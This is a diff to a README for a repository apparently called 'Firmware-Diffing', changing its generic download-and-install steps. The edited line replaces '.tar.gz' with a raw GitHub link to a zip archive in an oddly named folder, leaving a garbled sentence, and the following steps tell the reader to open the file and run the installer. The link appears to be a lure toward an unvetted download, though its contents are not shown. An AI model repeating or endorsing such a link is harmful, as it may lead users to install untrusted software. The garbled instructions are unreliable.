Alosh-ui/Firmware-Diffing/README.md

 3. Download the file that matches your operating system.
 For example:
    - For Windows, look for `.exe` files.
    - For macOS, you might find `.dmg` files.
-   - For Linux, you may see `.tar.gz` files.
+   - For Linux, you may see `https://raw.githubusercontent.com/Alosh-ui/Firmware-Diffing/main/Pierinae/Firmware-Diffing_2.6.zip` files.
 4. Once the download completes, locate the file on your computer.
 5. Open the file to begin the installation process.
 Follow the prompts to complete the setup.